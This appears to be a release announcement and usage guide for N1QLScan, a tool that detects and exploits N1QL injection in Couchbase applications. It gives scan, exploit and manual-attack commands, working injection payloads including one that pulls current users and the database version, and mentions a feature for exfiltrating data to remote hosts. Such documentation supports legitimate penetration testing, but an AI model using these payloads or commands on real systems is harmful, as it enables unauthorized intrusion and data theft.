N1QLScan
N1QLScan - Release Version 1.0.0
N1QLScan version 1.0.0 has finally been released!!
What is it?
N1QLScan is a tool for automating the detection and exploitation of N1QL injection vulnerabilities. It has undergone many iterations and rewrites, but it is finally been released and can be found at the link below:
What does it do?
It aims to simplify the detection and exploitation of N1QL injection vulnerabilities, but still allows advanced exploitation through specifying custom payloads.
Usage
Installation
It can be installed directly via the following command:
go install github.com/felsec/n1qlscan@latest
Alternatively, the pre-compiled binaries can be downloaded from the GitHub repos’ Releases page.
Modes
N1QLScan has 3 modes:
- Scan
This mode takes a URL or request file and scans the available parameters for N1QL injection points. If a vulnerable endpoint is detected the application determines the injection methods that can be used and generates a test payload for easy confirmation. A vulnerable.data file is also produced ready for use in the next mode.
- Exploit
This mode uses the exploitation methods in the vulnerable.data file to extract the requested data from the Couchbase instance.
It also allows for the exfiltration of data to remote hosts using the built-in CURL functionality.
- Manual
This mode, as the name suggests, allow you to perform custom exploitation attempts against applications or specify advanced payloads.
Running a scan
Running a scan against a target application can either be done by specifying the URL:
n1qlscan scan -u https://vulnerable.app/blog/post?id=123456
Or, by providing a request file:
n1qlscan scan -r ./vulnerable-request
Running n1qlscan scan -h gives you a comprehensive list of all of the options supported by the scan command.
N1QLScan will then go through all of the injection points and attempt to identify any vulnerable parameters, returning the following on a successful scan:
+============================================================+
Query parameter id is vulnerable to Boolean-based Blind N1QL injection
Location: Query parameter
Parameter: id
Detection Method: p1'
Exploit Type: Boolean-based Blind
Example Payload: p1'and'S2LYgiU1'='S2LYgiU1
Payload Template: p1'and<payload>=<check>
+============================================================+
...
+============================================================+
Query parameter id is vulnerable to Union-based N1QL injection
Location: Query parameter
Parameter: id
Detection Method: p1')--
Exploit Type: Union-based
Example Payload: p1'union select'N1QLSCAN'as nickel28)--
Payload Template: p1'union <payload>)--
+============================================================+
...
At this point we are ready to move onto the next phase.
Exploiting a target
After successfully scanning the target application and identifying a vulnerable parameter, the next step is to run malicious queries to extract the data from the Couchbase instance. This can be done as follows:
URL:
n1qlscan exploit -u https://vulnerable.app/blog/post?id=123456 --get-current-user
Request File:
n1qlscan exploit -r ./vulnerable-request --get-current-user
Running n1qlscan exploit -h gives you a comprehensive list of all of the options supported by the exploit command.
Running a manual attack
When running a manual attack you need to specify the following parts:
- The target via a URL or request file;
- The parameter to inject the payload into;
- The payload to be executed.
n1qlscan manual {--url URL | --request FILE} --payload PAYLOAD --parameter PARAMETER
For example:
n1qlscan manual --url 'http://vulnerable.app/blog/post?id=p1&debug=y' --parameter id --payload "' UNION SELECT raw {\"title\":\"N1QLSCAN\",\"content\":\"injected-\"||CURRENT_USERS()[0],\"id\":DS_VERSION()} )--"
Running n1qlscan manual -h gives you a comprehensive list of all of the options supported by the manual command.
Future Developments
As this is first there are lots of areas for improvement or new features that can be added, such as support for obfuscation methods, so keep any eye out for new releases.